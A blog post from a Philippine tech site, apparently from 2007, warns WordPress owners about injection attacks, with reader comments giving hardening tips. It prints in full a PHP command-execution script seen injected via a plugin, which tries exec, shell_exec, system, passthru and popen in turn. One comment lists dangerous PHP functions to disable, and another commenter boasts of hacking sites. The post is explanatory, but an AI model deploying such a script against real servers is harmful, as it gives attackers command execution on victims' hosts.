One of the ugliest thing that could happen to a blog or a website is getting hacked. For a person like me who runs his own dedicated server, this is a daily pain in the neck. We get hack attacks everyday, some by expert hackers but mostly script kiddies who take some scripts laying around somewhere and try to inject malicious codes into your site hoping to get access.
Since Friday, my blog has been targeted incessantly. You could be next! (Or you’ve already been, you just don’t know it yet.) So be wary.
One of the first signs of hacks attempts can be detected thru your error_logs. They’re usually found on the root folder of your site or the base directory of your blog. What they usually do is affix a script in your URL hoping to execute it. Here’s one script I found being injected to my PodPress plugin:
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and being pulled up from the target site. Your error logs might display this as such:
[30-Jul-2007 08:17:57] PHP Warning: parse_url + the URL it’s testing for holes or vulnerabilities.
So, be careful. Always check your files for open permissions (+777) and fix them. Upgrade to the latest stable version of WordPress or any software you’re using. Check all your plugins if they need upgrades too. It’s usually the plugins (that we don’t bother to check) where we least expect them to attack.
YugaTech.com is the largest and longest-running technology site in the Philippines. Originally established in October 2002, the site was transformed into a full-fledged technology platform in 2005.
How to transfer, withdraw money from PayPal to GCash
Prices of Starlink satellite in the Philippines
Install Google GBox to Huawei smartphones
Pag-IBIG MP2 online application
How to check PhilHealth contributions online
How to find your SIM card serial number
Globe, PLDT, Converge, Sky: Unli fiber internet plans compared
10 biggest games in the Google Play Store
LTO periodic medical exam for 10-year licenses
Netflix codes to unlock hidden TV shows, movies
Apple, Asus, Cherry Mobile, Huawei, LG, Nokia, Oppo, Samsung, Sony, Vivo, Xiaomi, Lenovo, Infinix Mobile, Pocophone, Honor, iPhone, OnePlus, Tecno, Realme, HTC, Gionee, Kata, IQ00, Redmi, Razer, CloudFone, Motorola, Panasonic, TCL, Wiko
Best Android smartphones between PHP 20,000 - 25,000
Smartphones under PHP 10,000 in the Philippines
Smartphones under PHP 12K Philippines
Best smartphones for kids under PHP 7,000
Smartphones under PHP 15,000 in the Philippines
Best Android smartphones between PHP 15,000 - 20,000
Smartphones under PHP 20,000 in the Philippines
Most affordable 5G phones in the Philippines under PHP 20K
5G smartphones in the Philippines under PHP 16K
Smartphone pricelist Philippines 2024
Smartphone pricelist Philippines 2023
Smartphone pricelist Philippines 2022
Smartphone pricelist Philippines 2021
Smartphone pricelist Philippines 2020
trouver un mot de says:
Through some combination of Gates withdrawing his influence of pride in the
brand to the point of arrogance, and Ballmer introducing the business common sense that customers should be kept happy if it can
be done affordably, Microsoft was able to understand how much Vista
sucked, and how much they had sucked up until then.
You might want to turn them on to read dialouge over other sounds
in the game. If there’s one game this year that is screaming next-generation, it is Watch Dogs.
agapito bagumbayan says:
nah. yah man. hard ?
will everybody knows about that, but what shall we do? even we comment here we cannot deny the fact that it is been done already. the thing that i can say is that do thing that can make the hackers paralysed.
t3chn1c1.0 says:
hey man!
looks like you got so many followers i need your help on reporting some sites i have hacked before some black hats could deface them. especially the website of sun cellular which i still haven’t publish on my blog.
Teenburg says:
i’m use WP Security Scan 2.2.56.49 plugin
henryc says:
I think auction.ph hae problem right now specially the One Peso auction fever of auction.ph since December 24,2007 4:00 pm event… right now the 3 auction.ph One Peso auction.ph no one can bid..
December 25,2007 10:00 Am MAGIC SING
2:00 pm LCD MONITOR
4:00 PM OLYMPUS FE-270 DIGITAL CAMERA
Bob Maguire says:
Just wanted to add a bit more. It wasn’t WordPress or my blog that was hacked, but a different 3rd-party PHP app on a different server, just in case that wasn’t totally clear.
For my particular hack, permissions wouldn’t have helped much as it essentially gave them as much rights as the web server process itself (which was not root, but enough to create zombies or other web-based daemons). What actually saved me was the server runs on a PPC and not X86 platform, so most of their executables they tried to upload didn’t work.
And whether it’s PHP, ASP, JSP, or whatever, the message is still the same. Anytime to use stuff from a third-party, you’re opening yourself to potential vulnerabilities.
Mine’s been closed for a while now, but it sure hasn’t stopped them from still trying. :)
wites says:
since wordpress is built under php, there’s more to it than just upgrading to the latest version. one way of securing your blog or any websites that run php should check their php config (php.ini) for “disable_functions”
here are some of the commonly abused php functions that should be disabled
show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen
but be warned that some client web scripts may break with some of these functions disabled.
Michael Russell says:
Thanks for the link!
Fortunately, I wasn’t hacked. A PHP hack doesn’t do much if your site is running ASP.NET. ;)
eric says:
hay nakakatakot naman…
boss abe, pwede makapa upgrade ng WP ko. pag di ka na busy.
thanks!
Jaypee says:
A lot of blogs have been defaced recently. One notable site that was recently hacked was CSS Remix.
That’s why it’s always advisable to have a backup of your DB offline in case of emergency.
Good luck with the hack attacks! :D
jhay says:
I think I was hacked before when the Ploghost server that hosted the .com.ph blogs went hay-wired just before the MOA Blogger meetup.
My blog’s DB was wiped clean! Good thing I had backups on standby, otherwise, I’d gone insane! ;)
Manuel Viloria says:
I’ve seen that attempted on sites with the Amember membership script. It’s as if someone is trying to get hold of usernames and passwords so that they can log into the members-only folder.
sparks says:
Nakakatakot naman itong post na ito. :(
jozzua says:
Annoying.. hack attacks. Good luck with it Abe.
Abe Olandres says:
skiper, yup dude, read about it last Saturday. Wasn’t able to comment kase closed ata. but thanks for the info. :)
skiper says:
Yuga, I encountered error on your site last friday and I blogged about it..
Check this out. This might help.
http://skiper.pinoyanswers.com/yugatechs-blog-encountered-internal-server-error/
Abe Olandres says:
@ Bob – lessons learned. ;)
@ Dorene – I suggest 644, unless otherwise specified by the app.
@ journeyist – yup, less is more secure. If you’re on BlgoSpot, LiveJournal or other hosted sites, less worry for you since it’s the provider that takes care of it. Plugins pose more threat because they come from varying sources.
journeyist says:
Does this mean a blog is LESS vulnerable if it has no plugins?
…and just curious, is this vulnerability issue via plugins also present when using other blogging platforms, like blogspot for instance?
Dorene says:
What should be the permission code if not 777?
Bob Maguire says:
Yes, a very important warning indeed. If I could just add emphasis on the “upgrade to the latest stable version” part, that’s how I got bitten. Actually, the provider of the software that had the vulnerability in it, discovered the problem and quickly provided a fix on the mailing list, of which I was a member. However, I put it on my “to do” list where I promptly forgot about it and never applied the fix, only to get hacked a month or so later.
So yes, keep your software and plug-ins up to date!
bob